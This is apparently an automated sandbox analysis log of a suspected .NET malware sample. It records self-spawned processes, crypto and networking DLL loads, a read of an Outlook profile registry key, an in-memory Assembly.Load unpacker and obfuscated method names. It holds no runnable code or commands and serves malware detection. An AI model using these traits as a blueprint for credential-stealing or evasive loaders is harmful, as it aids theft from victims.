Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Process created: C:\Users\user\Desktop\n8l3NmC5EH.exe "C:\Users\user\Desktop\n8l3NmC5EH.exe"	Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: n8l3NmC5EH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: n8l3NmC5EH.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: n8l3NmC5EH.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: WOBv.pdbSHA256 source: n8l3NmC5EH.exe
Source:	Binary string: WOBv.pdb source: n8l3NmC5EH.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.n8l3NmC5EH.exe.40da528.0.raw.unpack, MainForm.cs	.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, M9eYWDI95I4qYnEqnl.cs	.Net Code: bkXcqFAGVb System.Reflection.Assembly.Load(byte[])
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, M9eYWDI95I4qYnEqnl.cs	.Net Code: bkXcqFAGVb System.Reflection.Assembly.Load(byte[])
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, M9eYWDI95I4qYnEqnl.cs	.Net Code: bkXcqFAGVb System.Reflection.Assembly.Load(byte[])
Source: 0.2.n8l3NmC5EH.exe.40ba508.1.raw.unpack, MainForm.cs	.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])

Source: n8l3NmC5EH.exe

Static PE information: 0xFE5D7A99 [Thu Mar 26 19:31:37 2105 UTC]

Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_07487750 push cs; ret	0_2_07487751
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0775D4D5 push FFFFFF8Bh; iretd	0_2_0775D4D7
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 0_2_0775BD28 push esp; ret	0_2_0775BE05
Source: C:\Users\user\Desktop\n8l3NmC5EH.exe	Code function: 3_2_01079C30 push esp; retf 0119h	3_2_01079D55

Source: n8l3NmC5EH.exe

Static PE information: section name: .text entropy: 7.766773390925057

Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, kAgg8l2sijaXejHB40.cs	High entropy of concatenated method names: 'bV3m7KK6vX', 'fnXmvyPC64', 'C6q4fVhlLQ', 'nWx4gPpFLo', 'AjomGForCc', 'mqemik6Qu1', 'rMfm0DYuJ5', 'W6Qm5gr9sS', 'nFom3pddbe', 'fovmkqGBmS'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, ECwjKMMNiOdRA7uAlg.cs	High entropy of concatenated method names: 'RXhd55vALu', 'dWkd3MxyE5', 'cF6dkrQgKo', 'M6udwsWCZ2', 'wBydlT5PiI', 'jUwd2SwDYo', 'fZJdPPKT3x', 'UZBd777emi', 'BrLdB1h7CK', 'AySdvmxnV9'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, HnEYjDPnWSeiubcCxY.cs	High entropy of concatenated method names: 'bt2tSa7LGP', 'wOPtm0fHe7', 'yJ9ttU6CAq', 'FobtY3r9v6', 'lj0tKeye7D', 'guxtyUBYtR', 'Dispose', 'U9K4JxxQ9t', 'fk54dxsqAH', 'esA49ORbAE'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, W8StgQNVUPN6UaF5Po.cs	High entropy of concatenated method names: 'wq99HvRhWt', 'YAR96oGWOu', 'jOD9MZiOwo', 'Waf9NxIlTv', 'GSk9SB5MlR', 'RtM9T6wyqx', 'Rh99mn6YkU', 'KcS94hNpyc', 'v889t3YG88', 'WCV9D4qFMM'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, atVKPSx2tbLvbWqRD8.cs	High entropy of concatenated method names: 'brJOCrstiS', 'HowOdAO2Cm', 'Yt0ORTUhjR', 'orIOU4AxQH', 'In8OIeOAi3', 'UbjRlXWd2q', 'L3OR2bZLOH', 'KW7RPplAgT', 'IwBR7K8jKx', 'CVBRBuHINt'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, W571SEgfpXscu85C0rV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E1TDG1AqEG', 'Y1kDi12uRV', 'QI1D0eKWc8', 'ch4D5FHxxk', 'UPPD3Ws39m', 'OFRDkqql5W', 'HxADwmUh6f'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, liVkvfggQSD8XmxErJo.cs	High entropy of concatenated method names: 'ORPDvls96B', 'IN0DzIr6IP', 'guJYf0Mb6g', 'RffYg720mr', 'JbqYskTUjK', 'OMyYXsgjdD', 'yTuYc48esA', 'ecKYC8YU4v', 'hECYJ3XjcD', 'LtKYdh0DDD'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, qA4Mfq5f2bJoMiWHK5.cs	High entropy of concatenated method names: 'c3pSW29dld', 'j27SiZnALl', 'fFwS55sjRV', 'NflS3PJSIL', 'OdIS8QB1jX', 'bv2SpqBeeS', 'VEMSaohZfe', 'wEHSQfJJwm', 'lAASbQYs8X', 'UBjSLNg6O3'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, ERft7DgcBL5iFFQDmx5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gVoetSQ0rd', 'w9NeDm88D6', 'CTeeYD8NZ4', 'GQ9eeJCqyD', 'PQteKaZCSM', 'fXUeFn2C3Y', 's26eyJ3Vgw'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, eVanR68tnSKQK66uPD.cs	High entropy of concatenated method names: 'q1t5RWlrK58jD3O8Dcq', 'S4GvYVlCay6HKuCX6BS', 'LclO4EmH2v', 'BLUOtOHF2n', 'jKdODXispV', 'Y7tu8vlce1CXjftGFbF', 'JPqEPDlWx4gCaASIjb1', 'KIZgYhlkp8Au87yhUb3'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, aSjEPsLbuW3jf20UBT.cs	High entropy of concatenated method names: 'c0yUJsOCFi', 'voBU9CyGRx', 'gN8UOHVmV5', 'rrLOvRTYjJ', 'ELtOz0rKgq', 'cByUfpgAUN', 'CNCUg0MA7k', 'M2PUsuAcFk', 'VdpUX5RtIN', 'paFUcdsuN6'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, jsBSrpdl90mkPRHphX.cs	High entropy of concatenated method names: 'Dispose', 'oeigBubcCx', 'n00s8Fp8C9', 'sXxs8GvxH9', 'tKZgvc4bAC', 'fpsgzuYBvO', 'ProcessDialogKey', 'cV8sf7pQ8C', 'AdLsgVw6QA', 'EL1ssW8EUl'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, fYlf55uO9qRUHNRX8e.cs	High entropy of concatenated method names: 'SKFUn9ZuEK', 'IS2Urea5iQ', 'IreUqQ0XQw', 'aSbUHxKEUm', 'BO7Uo2gFWh', 'qxTU66mduf', 'ECyU11B1wT', 'qFFUMZPqPc', 'yJkUNdPIQl', 'y69UV6NrHL'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, H7pQ8CBHdLVw6QANL1.cs	High entropy of concatenated method names: 'wWxtxxQcKq', 'Dp4t8VpZgh', 'OqQtpvFxvb', 'od7tar8Qv7', 'YLBtQxdGdN', 'AJDtbCijDr', 'xKWtLot9Mo', 'TnTtAKLQZd', 'ktEtufV5Rc', 'vFZtWcD98a'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, LM0OeQV9x9n8HxvovT.cs	High entropy of concatenated method names: 'b3gRobTMr8', 'e7eR13FAug', 'R7b9pHsb1B', 'CD29aFyrYc', 'iZe9QILBQV', 'QcN9bcCAJA', 'UGM9LLyrpS', 'CKg9AqOhUI', 'ISy9uHKRZF', 'thN9WqyWLY'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, BaxJhW0F4KUltsVN4x.cs	High entropy of concatenated method names: 'qkyjMaucwk', 'd77jNCa5Fc', 'puZjxIVDXo', 'tYyj8OKqii', 'kNZjafdrRE', 'uEUjQlPGt9', 'F0djLFTGyd', 'gu5jAAposY', 'bXLjWVwwd1', 'CVvjGOOJgT'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, FZkNlusRgZCphNaaw4.cs	High entropy of concatenated method names: 'JG3qiTvfo', 'aqhHvnfAE', 'xD36JBIPK', 'd9s1qZEbS', 'Gn6NS7Nse', 'c7bVC4vLE', 'FYr45SGcdiZhlPruB3', 'dvos04orDNIn5kAEds', 'Xoh4SpvDg', 'PK5D17psV'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, UL3kywkE1DcMHcp6yo.cs	High entropy of concatenated method names: 'ToString', 'zQJTGmNVgY', 's3gT83pIY2', 'vQbTp2SItl', 'ihrTasgMV9', 'j9qTQ7QM8N', 'HfVTbT3bTR', 'kqPTLeHnNE', 'BUFTAlII5p', 'HaQTuCCbb6'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, M9eYWDI95I4qYnEqnl.cs	High entropy of concatenated method names: 'f2YXC7CAWF', 'Y1tXJ0ASSd', 'h6NXdybaG3', 'mwXX9rPIJO', 'YOvXRbcxDg', 'XZsXOhDZes', 'KKcXUTjXBX', 'zi9XIW38X3', 'ej2Xh3MiRl', 'e8SXZ6UviL'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, J3rUP09BcynVHwjb7x.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BwesBGA1uy', 'iJesvc9aT1', 'P30sz9OTKp', 'KiyXf6hTM7', 'jSgXgHEfrc', 'mLIXs9DvEZ', 'TewXXvtA9G', 'Xj08rGaJ7WZyQK3xVOr'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, N8EUlbvG3jS7xNCTuj.cs	High entropy of concatenated method names: 'jUUD9oKqYv', 'CuTDRlHPZ2', 'JeiDOIcVsl', 'hhRDURIb4m', 'DsBDt4VrZA', 'aZWDIwewES', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, v1HahZzrDNN7Xf4KYj.cs	High entropy of concatenated method names: 'XR9D6JN0pH', 'Xc5DMmRB8H', 'dIBDNg5ZHw', 'k4SDx0FN15', 'VxdD8nmesc', 'nwRDakXoYP', 'gDODQTeX1X', 'oPpDyYNGO0', 'bZADnrYNOc', 'cS0DrEyfOv'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, fmgILnc5aLBALle6mb.cs	High entropy of concatenated method names: 'UHNgUCwjKM', 'EiOgIdRA7u', 'JVUgZPN6Ua', 'w5PgEoLM0O', 'GvogSvTftV', 'vPSgT2tbLv', 'xpZxOnN86EMeiCefYc', 'waWweJK9LpK6eZ4oN5', 'rRcggnX618', 'TEEgXDoVGi'
Source: 0.2.n8l3NmC5EH.exe.4b26998.2.raw.unpack, ggu6BDwa8ZgZHdPNpy.cs	High entropy of concatenated method names: 'lq0mZwyusT', 'vSlmEj6QwK', 'ToString', 'YPsmJJuK0N', 'wLMmdmDKXd', 'VfQm9e7Mue', 'QV9mRlFiiL', 'R53mOQZsSd', 'tkvmU3hx0C', 'wwimIyQeMX'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, kAgg8l2sijaXejHB40.cs	High entropy of concatenated method names: 'bV3m7KK6vX', 'fnXmvyPC64', 'C6q4fVhlLQ', 'nWx4gPpFLo', 'AjomGForCc', 'mqemik6Qu1', 'rMfm0DYuJ5', 'W6Qm5gr9sS', 'nFom3pddbe', 'fovmkqGBmS'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, ECwjKMMNiOdRA7uAlg.cs	High entropy of concatenated method names: 'RXhd55vALu', 'dWkd3MxyE5', 'cF6dkrQgKo', 'M6udwsWCZ2', 'wBydlT5PiI', 'jUwd2SwDYo', 'fZJdPPKT3x', 'UZBd777emi', 'BrLdB1h7CK', 'AySdvmxnV9'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, HnEYjDPnWSeiubcCxY.cs	High entropy of concatenated method names: 'bt2tSa7LGP', 'wOPtm0fHe7', 'yJ9ttU6CAq', 'FobtY3r9v6', 'lj0tKeye7D', 'guxtyUBYtR', 'Dispose', 'U9K4JxxQ9t', 'fk54dxsqAH', 'esA49ORbAE'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, W8StgQNVUPN6UaF5Po.cs	High entropy of concatenated method names: 'wq99HvRhWt', 'YAR96oGWOu', 'jOD9MZiOwo', 'Waf9NxIlTv', 'GSk9SB5MlR', 'RtM9T6wyqx', 'Rh99mn6YkU', 'KcS94hNpyc', 'v889t3YG88', 'WCV9D4qFMM'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, atVKPSx2tbLvbWqRD8.cs	High entropy of concatenated method names: 'brJOCrstiS', 'HowOdAO2Cm', 'Yt0ORTUhjR', 'orIOU4AxQH', 'In8OIeOAi3', 'UbjRlXWd2q', 'L3OR2bZLOH', 'KW7RPplAgT', 'IwBR7K8jKx', 'CVBRBuHINt'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, W571SEgfpXscu85C0rV.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E1TDG1AqEG', 'Y1kDi12uRV', 'QI1D0eKWc8', 'ch4D5FHxxk', 'UPPD3Ws39m', 'OFRDkqql5W', 'HxADwmUh6f'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, liVkvfggQSD8XmxErJo.cs	High entropy of concatenated method names: 'ORPDvls96B', 'IN0DzIr6IP', 'guJYf0Mb6g', 'RffYg720mr', 'JbqYskTUjK', 'OMyYXsgjdD', 'yTuYc48esA', 'ecKYC8YU4v', 'hECYJ3XjcD', 'LtKYdh0DDD'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, qA4Mfq5f2bJoMiWHK5.cs	High entropy of concatenated method names: 'c3pSW29dld', 'j27SiZnALl', 'fFwS55sjRV', 'NflS3PJSIL', 'OdIS8QB1jX', 'bv2SpqBeeS', 'VEMSaohZfe', 'wEHSQfJJwm', 'lAASbQYs8X', 'UBjSLNg6O3'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, ERft7DgcBL5iFFQDmx5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gVoetSQ0rd', 'w9NeDm88D6', 'CTeeYD8NZ4', 'GQ9eeJCqyD', 'PQteKaZCSM', 'fXUeFn2C3Y', 's26eyJ3Vgw'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, eVanR68tnSKQK66uPD.cs	High entropy of concatenated method names: 'q1t5RWlrK58jD3O8Dcq', 'S4GvYVlCay6HKuCX6BS', 'LclO4EmH2v', 'BLUOtOHF2n', 'jKdODXispV', 'Y7tu8vlce1CXjftGFbF', 'JPqEPDlWx4gCaASIjb1', 'KIZgYhlkp8Au87yhUb3'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, aSjEPsLbuW3jf20UBT.cs	High entropy of concatenated method names: 'c0yUJsOCFi', 'voBU9CyGRx', 'gN8UOHVmV5', 'rrLOvRTYjJ', 'ELtOz0rKgq', 'cByUfpgAUN', 'CNCUg0MA7k', 'M2PUsuAcFk', 'VdpUX5RtIN', 'paFUcdsuN6'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, jsBSrpdl90mkPRHphX.cs	High entropy of concatenated method names: 'Dispose', 'oeigBubcCx', 'n00s8Fp8C9', 'sXxs8GvxH9', 'tKZgvc4bAC', 'fpsgzuYBvO', 'ProcessDialogKey', 'cV8sf7pQ8C', 'AdLsgVw6QA', 'EL1ssW8EUl'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, fYlf55uO9qRUHNRX8e.cs	High entropy of concatenated method names: 'SKFUn9ZuEK', 'IS2Urea5iQ', 'IreUqQ0XQw', 'aSbUHxKEUm', 'BO7Uo2gFWh', 'qxTU66mduf', 'ECyU11B1wT', 'qFFUMZPqPc', 'yJkUNdPIQl', 'y69UV6NrHL'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, H7pQ8CBHdLVw6QANL1.cs	High entropy of concatenated method names: 'wWxtxxQcKq', 'Dp4t8VpZgh', 'OqQtpvFxvb', 'od7tar8Qv7', 'YLBtQxdGdN', 'AJDtbCijDr', 'xKWtLot9Mo', 'TnTtAKLQZd', 'ktEtufV5Rc', 'vFZtWcD98a'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, LM0OeQV9x9n8HxvovT.cs	High entropy of concatenated method names: 'b3gRobTMr8', 'e7eR13FAug', 'R7b9pHsb1B', 'CD29aFyrYc', 'iZe9QILBQV', 'QcN9bcCAJA', 'UGM9LLyrpS', 'CKg9AqOhUI', 'ISy9uHKRZF', 'thN9WqyWLY'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, BaxJhW0F4KUltsVN4x.cs	High entropy of concatenated method names: 'qkyjMaucwk', 'd77jNCa5Fc', 'puZjxIVDXo', 'tYyj8OKqii', 'kNZjafdrRE', 'uEUjQlPGt9', 'F0djLFTGyd', 'gu5jAAposY', 'bXLjWVwwd1', 'CVvjGOOJgT'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, FZkNlusRgZCphNaaw4.cs	High entropy of concatenated method names: 'JG3qiTvfo', 'aqhHvnfAE', 'xD36JBIPK', 'd9s1qZEbS', 'Gn6NS7Nse', 'c7bVC4vLE', 'FYr45SGcdiZhlPruB3', 'dvos04orDNIn5kAEds', 'Xoh4SpvDg', 'PK5D17psV'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, UL3kywkE1DcMHcp6yo.cs	High entropy of concatenated method names: 'ToString', 'zQJTGmNVgY', 's3gT83pIY2', 'vQbTp2SItl', 'ihrTasgMV9', 'j9qTQ7QM8N', 'HfVTbT3bTR', 'kqPTLeHnNE', 'BUFTAlII5p', 'HaQTuCCbb6'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, M9eYWDI95I4qYnEqnl.cs	High entropy of concatenated method names: 'f2YXC7CAWF', 'Y1tXJ0ASSd', 'h6NXdybaG3', 'mwXX9rPIJO', 'YOvXRbcxDg', 'XZsXOhDZes', 'KKcXUTjXBX', 'zi9XIW38X3', 'ej2Xh3MiRl', 'e8SXZ6UviL'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, J3rUP09BcynVHwjb7x.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'BwesBGA1uy', 'iJesvc9aT1', 'P30sz9OTKp', 'KiyXf6hTM7', 'jSgXgHEfrc', 'mLIXs9DvEZ', 'TewXXvtA9G', 'Xj08rGaJ7WZyQK3xVOr'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, N8EUlbvG3jS7xNCTuj.cs	High entropy of concatenated method names: 'jUUD9oKqYv', 'CuTDRlHPZ2', 'JeiDOIcVsl', 'hhRDURIb4m', 'DsBDt4VrZA', 'aZWDIwewES', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, v1HahZzrDNN7Xf4KYj.cs	High entropy of concatenated method names: 'XR9D6JN0pH', 'Xc5DMmRB8H', 'dIBDNg5ZHw', 'k4SDx0FN15', 'VxdD8nmesc', 'nwRDakXoYP', 'gDODQTeX1X', 'oPpDyYNGO0', 'bZADnrYNOc', 'cS0DrEyfOv'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, fmgILnc5aLBALle6mb.cs	High entropy of concatenated method names: 'UHNgUCwjKM', 'EiOgIdRA7u', 'JVUgZPN6Ua', 'w5PgEoLM0O', 'GvogSvTftV', 'vPSgT2tbLv', 'xpZxOnN86EMeiCefYc', 'waWweJK9LpK6eZ4oN5', 'rRcggnX618', 'TEEgXDoVGi'
Source: 0.2.n8l3NmC5EH.exe.4bae5b8.3.raw.unpack, ggu6BDwa8ZgZHdPNpy.cs	High entropy of concatenated method names: 'lq0mZwyusT', 'vSlmEj6QwK', 'ToString', 'YPsmJJuK0N', 'wLMmdmDKXd', 'VfQm9e7Mue', 'QV9mRlFiiL', 'R53mOQZsSd', 'tkvmU3hx0C', 'wwimIyQeMX'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, kAgg8l2sijaXejHB40.cs	High entropy of concatenated method names: 'bV3m7KK6vX', 'fnXmvyPC64', 'C6q4fVhlLQ', 'nWx4gPpFLo', 'AjomGForCc', 'mqemik6Qu1', 'rMfm0DYuJ5', 'W6Qm5gr9sS', 'nFom3pddbe', 'fovmkqGBmS'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, ECwjKMMNiOdRA7uAlg.cs	High entropy of concatenated method names: 'RXhd55vALu', 'dWkd3MxyE5', 'cF6dkrQgKo', 'M6udwsWCZ2', 'wBydlT5PiI', 'jUwd2SwDYo', 'fZJdPPKT3x', 'UZBd777emi', 'BrLdB1h7CK', 'AySdvmxnV9'
Source: 0.2.n8l3NmC5EH.exe.7f40000.6.raw.unpack, HnEYjDPnWSeiubcCxY.cs	High entropy of concatenated method names: 'bt2tSa7LGP', 'wOPtm0fHe7', 'yJ9ttU6CAq', 'FobtY3r9v6', 'lj0tKeye7D', 'guxtyUBYtR', 'Dispose', 'U9K4JxxQ9t', 'fk54dxsqAH', 'esA49ORbAE'
